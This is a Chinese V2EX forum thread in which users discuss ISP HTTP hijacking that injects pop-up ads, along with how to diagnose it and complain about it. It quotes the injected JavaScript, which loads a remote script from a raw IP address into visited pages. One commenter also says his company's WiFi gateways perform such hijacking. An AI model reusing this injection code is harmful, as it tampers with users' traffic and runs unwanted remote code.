关于 http 劫持，我有几个问题想问下

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

已注册用户请登录

这是一个创建于 3297 天前的主题，其中的信息可能已经有所发展或是发生改变。

(function(){o="http://static.youku.com/ddshow/img/static/js/youku_laifeng_v11.js?";sh="http://61.160.200.223:7701/main.js?v=3.93&sp=307&y=dpc";w=window;d=document;function ins(s,dm,id){e=d.createElement("script");e.src=s;e.type="text/Javascript";id?e.id=id:null;dm.appendChild(e);};p=d.scripts[d.scripts.length-1].parentNode;ins(o,p);ds=function(){db=d.body;if(db && !document.getElementById("bdstat")){if((w.innerWidth||d.documentElement.clientWidth||db.clientWidth)>1){if(w.top==w.self){ins(sh,db,"bdstat");}}}else{setTimeout("ds()",1500);}};ds();})();var mim_sp = "307";var mim_aid = "10035";var mim_uid = "XVpZXVdJXF1fXlNL";var mim_src = "0";var mim_adtype = "0";var mim_ty = "dpc";

这是我访问优酷时右下角的弹窗广告， F12 后得到的可以看到 js 替换了。

Q1 ：如何判断是 ISP 的 http 劫持，第三方有没有可能进行 http 劫持？（我在 ipip.net 查了下， IP 是江苏常州电信， IDC 机房使用，又百度文库看到了这么一篇文章 http://wenku.baidu.com/link?url=LkiPgsXyYr15171BXhnV1gt3nvZVXtTb9dUxW9OQfUp9ts-PAGYjvISLC9TBkb_MJnBAPlJHlcZObEif8LjO6UTQTZuWzPsvdvrxaNqfcIC ，故有此疑问）

Q2 ：如果是第三方进行 http 劫持，那么 ISP 有没有责任？

Q3 ：能否对 http 劫持追踪来源？

劫持

ISP

第三方

F12

17 条回复 2016-12-08 00:35:00 +08:00

bdbai

2016-12-06 19:44:50 +08:00 via Android

进隐身模式看一下，排除扩展的干扰。如果还有篡改 js 的情况，基本可以确定是运营商干的。

这时候果断投诉就可以了。

stabc

2016-12-06 19:56:29 +08:00

我觉得 ISP 不会干这种事情。应该是第三方干的，也就是 ISP 官方委托的第三方。

cydysm

2016-12-06 20:00:24 +08:00 via Android

@bdbai 这个肯定不是扩展的问题， LOL 客户端 /TGP/IE/firefox/chrome/傲游均出现过，不同机器上都会有

cydysm

2016-12-06 20:01:31 +08:00 via Android

@stabc 这个如何确定

daviswei

2016-12-06 20:17:13 +08:00 via Android

@stabc ISP 其实也会干，像是偶尔插个广告、欠费通知这类的，频率未必

bdbai

2016-12-06 20:18:32 +08:00 via Android

@cydysm 那就可以打电话投诉了。一定要坚持到底，他们才会帮你处理掉。亲测苏州电信有用。

KCheshireCat

2016-12-06 22:51:58 +08:00

现在有些路由器也会干劫持这种事儿,请注意排除这种变量

cydysm

2016-12-07 00:32:28 +08:00 via Android

@KCheshireCat 这个考虑了，我那天发现后直接把线插 PC 上，因为频率不定，好久才出现

2016-12-07 02:05:50 +08:00

楼主不用怀疑，就是江苏电信干的。
手机开着 4G （移动）一直好好的，一连上 WIFI （电信）基本上每个 http 的网站都要在地址栏打两次才能跳出劫持。简直醉了。包括京东的 APP 商品详情也被劫持。

2016-12-07 02:07:43 +08:00

补充一下，在很多省份呆过，因为对线路稳定性有要求，基本上都是办理电信的 50M / 100M 包年或包半年，就江苏电信的劫持是最最最频繁的，不知名的网站都要劫持

lln133208

2016-12-07 09:24:51 +08:00

@RE 江苏电信，有些网站会有比较露骨的游戏广告之类的，这个是不是 ISP 的锅啊？

qianguozheng

2016-12-07 11:08:37 +08:00

我们公司做免费 wifi 的，我在所有的路由器网关设备上实现了 http 劫持的功能，如果你用我们的设备上网会出现这种问题的，哈哈。当然现在还没有全部开启

cydysm

2016-12-07 11:32:01 +08:00 via Android

@RE 可是我这是浙江电信。不过我查了下，很多浙江电信也有这种情况

loong0xf

2016-12-07 19:27:17 +08:00

@lln133208 是 ISP 投诉不鸟你

cydysm

2016-12-07 22:19:04 +08:00 via Android

@loong0xf 工信部投诉好使，下午外派过来了，外派过来当然没什么用。接下去杭州总部那边打电话给我处理

danili

2016-12-07 23:04:10 +08:00

今天下午就因为 http 劫持打 10000 投诉反应问题。随后专员回复电话询问具体情况说会有其他人联系我。
随后一个用座机打回给我的人问我要证据，我说我没截图，跟她理论了之后把电话挂机了。
过了差不多半个小时， 10000 号的人打回电话跟我说把我的宽带账号加入到“网络广告拦截系统”，如果再有弹窗广告就是我的问题了……………

这网络广告拦截系统应该就是一个黑名单吧……

cydysm

2016-12-08 00:35:00 +08:00 via Android

@danili 10000 号能处理是最好的了。应该是白名单。下午也给我在后台进行广告拦截了